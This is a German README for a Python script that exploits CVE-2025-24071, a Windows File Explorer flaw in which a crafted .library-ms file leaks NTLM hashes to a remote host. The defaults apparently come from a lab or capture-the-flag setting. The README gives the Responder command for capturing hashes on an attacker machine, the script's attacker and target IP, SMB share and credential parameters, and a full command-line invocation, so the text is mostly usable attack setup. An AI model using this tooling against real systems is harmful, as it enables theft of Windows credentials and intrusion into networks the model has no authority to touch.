
Python-Skript zur Ausführung von CVE-2025-24071
Dieses Projekt erkennt und demonstriert die Ausnutzung einer Windows Datei-Explorer Spoofing-Sicherheitslücke.
Das Problem ergibt sich aus einer Windows-Bibliotheksdatei (.library-ms), die einen Netzwerkpfad enthält, entweder als direkten Anhang oder eingebettet in ein Archiv.
Wenn geöffnet, kann die Datei dazu führen, dass Windows NTLM-Hashes an einen entfernten (potenziell schädlichen) Netzwerkstandort weitergibt.
Führen Sie auf Ihrem Angriffsrechner Responder aus, um NTLM-Hashes zu erfassen:
sudo responder -I tun0 -wvF
Sie können das Skript auf zwei Arten konfigurieren:
✅ Option A: Standardwerte bearbeiten (am einfachsten)
Ändern Sie die Standardparameter direkt im Skript.
parser.add_argument("--attacker-ip", default="10.10.14.14", help="Angreifer-IP") # Ihre IP
parser.add_argument("--target-ip", default="10.129.232.88", help="Ziel-IP") # Ziel-IP
parser.add_argument("--share-name", default="IT", help="SMB-Freigabename") # Name der Freigabe, auf die Sie Zugriff haben (ohne /)
parser.add_argument("--username", default="USERNAME", help="SMB-Benutzername") # Benutzername des Freigabebesitzers
parser.add_argument("--password", default="PASSWORD", help="SMB-Kennwort") # Kennwort des Freigabebesitzers
parser.add_argument("--interface", default="tun0", help="Responder-Netzwerkschnittstelle") # Prüfen Sie ifconfig, aber tun0 funktioniert, wenn Sie ein VPN verwenden
return parser.parse_args()
✅ Option B: Mit CLI-Parametern ausführen
Ausführen mit Argumenten:
python3 CVE-2025-24071.py \
--attacker-ip <ANGREIFER_IP> \
--target-ip <ZIEL_IP> \
--share-name <FREIGABE_NAME> \
--username <BENUTZERNAME> \
--password <KENNWORT> \
--interface <SCHNITTSTELLE>